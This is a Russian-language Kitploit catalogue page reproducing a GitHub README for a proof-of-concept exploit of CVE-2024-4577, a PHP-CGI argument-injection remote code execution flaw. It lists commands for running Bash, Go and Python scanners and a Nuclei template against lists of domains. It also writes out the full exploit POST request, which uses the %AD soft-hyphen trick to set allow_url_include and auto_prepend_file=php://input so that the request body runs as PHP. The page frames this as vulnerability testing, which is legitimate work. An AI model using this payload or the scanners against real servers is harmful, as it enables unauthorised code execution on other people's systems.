Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC для CVE-2024-4577, написанный на bash, go, python и шаблоне nuclei | Kitploit
Инструменты/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC для CVE-2024-4577, написанный на bash, go, python и шаблоне nuclei

Репозиторий
331321 месяц назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PHP RCE PoC

CVE-2024-4577: Внедрение аргументов в PHP-CGI

Обзор

Этот репозиторий содержит скрипты для проверки уязвимости CVE-2024-4577 — проблемы внедрения аргументов в PHP-CGI. Вы можете использовать предоставленные скрипты на Bash, Go и Python для тестирования списка доменов на эту уязвимость. Я также опубликовал файл YAML для Nuclei.

Использование

Скрипт на Bash

Чтобы использовать скрипт на Bash, выполните следующую команду:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Скрипт на Go

Сначала сохраните скрипт на Go в файл с именем CVE-2024-4577.go. Для сборки и запуска скрипта на Go:

  1. Скомпилируйте скрипт на Go в бинарный файл:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Запустите бинарный файл, указав файл со списком доменов в качестве аргумента:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Скрипт на Python

    Сначала сохраните скрипт на Python в файл с именем CVE-2024-4577.py. Для запуска скрипта на Python:

    1. Убедитесь, что установлена библиотека requests:

      root@kitploit:~
      pip install requests
      
    2. Запустите скрипт на Python, указав файл со списком доменов в качестве аргумента:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (Опционально) Если вы хотите выводить только уязвимые хосты:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    Подробности Proof of Concept (POC)

    Для ручной проверки уязвимости вы можете отправить следующий POST-запрос:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Шаблон Nuclei

    Я также создал шаблон Nuclei для сканирования уязвимых экземпляров; он использует схему макета v3 и был протестирован в лабораторной среде:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    Пример списка доменов

    Список доменов должен быть предварительно дополнен http/https, чтобы они правильно считывались.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Пример вывода

    Если домен оказывается уязвимым, вывод будет таким:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    Скачать инструмент